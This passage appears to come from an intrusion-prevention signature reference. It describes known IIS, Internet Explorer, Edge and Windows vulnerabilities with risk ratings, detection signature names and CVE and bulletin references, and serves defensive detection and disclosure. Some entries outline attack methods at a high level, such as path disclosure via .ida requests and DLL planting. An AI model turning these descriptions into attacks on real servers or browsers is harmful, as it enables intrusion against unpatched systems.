Description: A design weakness in the UlpParseAcceptEncoding method causes a vulnerability in Microsoft IIS. A successful attack can allow an attacker to execute arbitrary code on the target system or cause a denial of service condition.
Situation: HTTP_CRH-Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution
References:
CVE-2021-31166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31166
Back to top

Microsoft-IIS-IDA-Path-Disclosure

About this vulnerability: Microsoft IIS IDA Path Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IIS 4.0
Type: Configuration Error
Description: A vulnerability exists in IIS 4.0 which allows remote attackers to obtain the real pathname of the document by requesting non-existent files with .ida or .idq extensions.
Situation: HTTP_CS-Microsoft-IIS-IDA-Path-Disclosure
References:
CVE-2000-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0071
BID-1065
http://www.securityfocus.com/bid/1065
Back to top

Microsoft-IIS-Multiple-Extensions-Security-Bypass

About this vulnerability: A vulnerability in Microsoft Internet Information Services (IIS)
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 6.0
Type: Malfunction
Description: A security bypass vulnerability exists in Microsoft IIS web server. This vulnerability is due to an design error while handling file names which contain multiple extensions. Note that IIS must be in a non-default configuration for this vulnerability to occur. An attacker can exploit this vulnerability by uploading and executing files using a third party application, even if that application restricts the upload of files based on the file's extension.
Situation: HTTP_CSU-Microsoft-IIS-Multiple-Extensions-Security-Bypass
References:
CVE-2009-4444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4444
BID-37460
http://www.securityfocus.com/bid/37460
Back to top

Microsoft-IIS-Remote-Code-Execution-CVE-2015-1635

About this vulnerability: A vulnerability in Microsoft IIS
Risk: High
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows 2012; Windows 2012 R2
Software: IIS
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Microsoft HTTP.sys. The vulnerability is due to an issue with the processing of HTTP messages in the HTTP protocol stack. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HTTP request to a vulnerable server.
Situation: HTTP_CSH-Microsoft-Remote-Code-Execution-IIS-CVE-2015-1635
References:
CVE-2015-1635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
MS15-034
http://technet.microsoft.com/security/bulletin/MS15-034
Back to top

Microsoft-IIS-Repeated-Parameter-Request-CVE-2010-1899

About this vulnerability: A vulnerability in Microsoft IIS
Risk: High
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 5.1; IIS 6.0; IIS 7.0; IIS 7.5
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Information Services (IIS).
References:
CVE-2010-1899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1899
MS10-065
http://technet.microsoft.com/security/bulletin/MS10-065
Back to top

Microsoft-IIS-Repeated-Parameter-Request-Denial-Of-Service

About this vulnerability: Microsoft IIS crashes when sent malicious POST request with too many name-value pairs
Risk: High
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: Microsoft IIS has a vulnerability which is due to stack exhaustion while processing HTTP request to ASP resources. A remote unauthenticated attacked can exploit this flaw by sending a POST request with too many name-value pairs.
Situation: HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
HTTP_CRL-Too-Many-Parameters-In-GET-Request
References:
CVE-2010-1899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1899
BID-43140
http://www.securityfocus.com/bid/43140
MS10-065
http://technet.microsoft.com/security/bulletin/MS10-065
Back to top

Microsoft-IIS-Request-Header-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Internet Information Services
Risk: Moderate
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 7.5
Type: Buffer Overflow
Description: A code execution vulnerability exists in Microsoft Internet Information Services (IIS) when FastCGI is enabled. The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process. Unsuccessful exploitation could create a denial-of-service (DoS) condition when the service reaches its restart limit.
Situation: HTTP_CS-Microsoft-IIS-Request-Header-Buffer-Overflow
References:
CVE-2010-2730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2730
BID-43138
http://www.securityfocus.com/bid/43138
MS10-065
http://technet.microsoft.com/security/bulletin/MS10-065
Back to top

Microsoft-IIS-Schannel-Improper-Certificate-Verification

About this vulnerability: Microsoft IIS Schannel Improper Certificate Verification vulnerability.
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft IIS SChannel
Type: Insecure Configuration
Description: A vulnerability in Microsoft IIS Secure Channel when certificate authentication is used, due to no proper validation of the client's key exchange data in the TLS handshake message, which allows remote attackers to spoof authentication by crafting a TLS packet based on the knowlege of the certificate.
Situation: Generic_CS-Microsoft-IIS-Schannel-Improper-Certificate-Verification
References:
CVE-2009-0085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0085
OSVDB-52521
http://www.osvdb.org/52521
MS09-007
http://technet.microsoft.com/security/bulletin/MS09-007
Back to top

Microsoft-IIS-Server-Crafted-Asp-Page-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of crafted ASP pages in IIS
Risk: Moderate
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of crafted ASP pages in IIS. A remote attacker can exploit this vulnerability by uploading a crafted ASP page containing an excessively long include file parameter to the target host and then requesting it, which can enable arbitrary code execution with the privileges of the vulnerable web server.
Situation: HTTP_CS-Excessively-Long-Asp-Include-File-Argument
FTP_UL-Excessively-Long-Asp-Include-File-Argument
File-Text_Excessively-Long-Asp-Include-File-Argument
References:
CVE-2006-0026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0026
BID-18858
http://www.securityfocus.com/bid/18858
OSVDB-27152
http://www.osvdb.org/27152
MS06-034
http://technet.microsoft.com/security/bulletin/MS06-034
Back to top

Microsoft-IIS-UNC-Path-Disclosure-Vulnerability

About this vulnerability: HTTP-request to .ida or .idq -files detected
Risk: Low
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: IIS
Type: Configuration Error
Description: Requesting non-existent files with .ida or .idq -extensions allows the attacker to get the real document root pathname in IIS 4.0.
Situation: HTTP_CSU-Microsoft-IIS-UNC-Path-Disclosure-Vulnerability
References:
CVE-2000-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0071
BID-1065
http://www.securityfocus.com/bid/1065
Back to top

Microsoft-IIS-UNC-Path-Source-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Information Server
Risk: Moderate
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Malfunction
Description: There is a source code disclosure vulnerability in Microsoft Internet Information Server. A crafted URL that contains a backslash character may be used to show the source code of active server pages (ASP).
Situation: HTTP_CSU-Microsoft-IIS-UNC-Path-Source-Disclosure
References:
CVE-2000-0246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0246
BID-1081
http://www.securityfocus.com/bid/1081
MS00-019
http://technet.microsoft.com/security/bulletin/MS00-019
Back to top

Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability

About this vulnerability: Detected attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: There is a library loading vulnarability in Microsoft Windows
Situation: HTTP_CSU-Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
SMB-TCP_CHS_Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
References:
CVE-2010-3138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3138
OSVDB-67551
http://www.osvdb.org/67551
MS12-014
http://technet.microsoft.com/security/bulletin/MS12-014
Back to top

Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_CSU-Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144
References:
CVE-2010-3144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3144
MS10-097
http://technet.microsoft.com/security/bulletin/MS10-097
Back to top

Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2008
Software: Internet Explorer 7.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer 7. The flaw is due to a boundary error when handling overly long WebDAV pathname strings. An attacker can exploit this vulnerability by persuading the target user to open a malicious web page. Successful attack could allow for arbitrary code injection and execution with privileges of the currently logged on user. Note that Assurent has not been able to reproduce the vulnerability during the contractual research period. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the application would terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution
References:
CVE-2008-4259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4259
BID-32586
http://www.securityfocus.com/bid/32586
MS08-073
http://technet.microsoft.com/security/bulletin/MS08-073
Back to top

Microsoft-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811

About this vulnerability: A code execution vulnerability in the Microsoft Internet Explorer 8 Developer Tools
Risk: High
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a remote code execution vulnerability in the Microsoft Internet Explorer 8 Developer Tools.
Situation: HTTP_SS-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811
References:
CVE-2010-0811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0811
MS10-034
http://technet.microsoft.com/security/bulletin/MS10-034
Back to top

Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles the loading of IESHIMS.DLL. A remote attacker can exploit this vulnerability by enticing a target user to save a maliciously crafted dynamic link library (DLL) file on the desktop or modify the system variable PATH. Upon starting the Internet Explorer 8, the malicious DLL will be loaded and executed. In a successful attack the behaviour of the target host is entirely dependent on the intended function of the malicious DLL. The code, in this case, would execute within the security context of the currently logged in user.
Situation: HTTP_CRL-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
SMB-TCP_SMB-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
References:
CVE-2011-0038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0038
BID-46159
http://www.securityfocus.com/bid/46159
OSVDB-70833
http://www.osvdb.org/70833
MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003
Back to top

Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 5.0; Internet Explorer 6.0
Type: Malfunction
Description: There exists a vulnerability in Internet Explorer versions 5 and 6.
Situation: File-Text_Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability
References:
CVE-2004-2219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2219
BID-10943
http://www.securityfocus.com/bid/10943
Back to top

Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 11.0
Type: Input Validation
Description: There exists a website spoofing vulnerability in Microsoft Internet Explorer and Edge.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing
References:
CVE-2017-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0033
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a type confusion vulnerability in the HandleColumnBreakOnColumnSpanningElement function of Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion
References:
CVE-2017-0037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0037
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer and Edge.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption
References:
CVE-2015-6140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6140
MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0; Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion
References:
CVE-2016-0061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0061
MS16-009
http://technet.microsoft.com/security/bulletin/MS16-009
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer and Edge.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption
References:
CVE-2016-0154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0154
MS16-037
http://technet.microsoft.com/security/bulletin/MS16-037
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption
References:
CVE-2016-3247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3247
MS16-104
http://technet.microsoft.com/security/bulletin/MS16-104
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-3325-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to access sensitive information.
Situation: HTTP_SHS-Suspicious-Reply
References:
CVE-2016-3325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3325
MS16-105
http://technet.microsoft.com/security/bulletin/MS16-105
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to access sensitive information. This vulnerability has been widely used in the wild to spread malware.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure
References:
CVE-2016-3351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3351
MS16-104
http://technet.microsoft.com/security/bulletin/MS16-104
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-829-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Internet Explorer and Microsoft Edge.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure
References:
CVE-2016-7195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7195
MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer and Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption
References:
CVE-2016-7202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202
MS16-144
http://technet.microsoft.com/security/bulletin/MS16-144
Back to top

Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-841-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 11.0
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion
References:
CVE-2016-7287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7287
MS16-144
http://technet.microsoft.com/security/bulletin/MS16-144
Back to top

Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 11.0
Type: Malfunction
Description: There exists a type confusion vulnerability in the scripting engines of Microsoft Edge and Internet Explorer. A remote attacker can use this to disclose information from or execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion
References:
CVE-2016-7241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7241
MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129
Back to top

Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297

About this vulnerability: An attempt to exploit a vulnerability in Internet Explorer detected
Risk: High
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer and Edge. This vulnerability is due to improper access of objects in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297
References:
CVE-2016-3297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3297
Back to top

Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer
Type: Input Validation
Description: There has been reported an information disclosure vulnerability in Microsoft Internet Explorer and Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to information disclosure.
Situation: File-Text_Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read
References:
CVE-2018-0891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0891
Back to top

Microsoft-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS

About this vulnerability: A vulnerability in Microsoft Groove Server
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer; Microsoft Sharepoint
Type: Cross-site Scripting
Description: A vulnerability exists in Microsoft Windows Internet Explorer and SharePoint Server products that may allow remote attackers to execute Cross Site Scripting attacks within a target system. The vulnerability is due to insufficient validation of HTML code. Remote attackers can exploit this vulnerability by enticing the target user to view a Web page containing crafted use of the Cascading Style Sheets (CSS) @import rule. Successful exploitation of this vulnerability could lead to information disclosure and execution of arbitrary script code within the context of the target system. Note: This vulnerability is different than the one identified by CVE-2010-1257.
Situation: File-Text_MS-Internet-Explorer-And-Sharepoint-Services-HTML-Sanitization-XSS
References:
CVE-2010-3324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3324
MS10-072
http://technet.microsoft.com/security/bulletin/MS10-072
MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071
Back to top

Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Microsoft SharePoint Services; Microsoft Office SharePoint Server 2007
Type: Input Validation
Description: There exists an information disclosure vulnerability in Internet Explorer. With a successful attack, a remote attacker can leverage this to execute script on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure
References:
CVE-2010-3243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3243
BID-43703
http://www.securityfocus.com/bid/43703
MS10-071
http://technet.microsoft.com/security/bulletin/MS10-071
Back to top

Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows Vista; Windows XP; Windows 2003
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles certain property of a ANIMATEMOTION object. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Internet Explorer may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability
References:
CVE-2008-0077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0077
BID-27666
http://www.securityfocus.com/bid/27666
MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010
Back to top

Microsoft-Internet-Explorer-Array-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0
Type: Malfunction
Description: A type confusion vulnerability exists in Microsoft Internet Explorer. This vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Array-Type-Confusion
References:
CVE-2015-2448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2448
MS15-079
http://technet.microsoft.com/security/bulletin/MS15-079
Back to top

Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure
References:
CVE-2015-6053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6053
MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106
Back to top

Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-2421

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-ALSR-Bypass-CVE-2015-2421
References:
CVE-2015-2421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2421
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer's handling of objects during asynchronous processing. The vulnerability is due to the access of a deleted object. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted web page or MS Office document that uses the Internet Explorer rendering engine. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Text_Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption
References:
CVE-2012-2521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2521
OSVDB-84596
http://www.osvdb.org/84596
MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052
Back to top

Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption
References:
CVE-2012-1524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1524
OSVDB-83652
http://www.osvdb.org/83652
MS12-044
http://technet.microsoft.com/security/bulletin/MS12-044
Back to top

Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion
References:
CVE-2016-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0199
MS16-063
http://technet.microsoft.com/security/bulletin/MS16-063
Back to top

Microsoft-Internet-Explorer-Body-Element-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
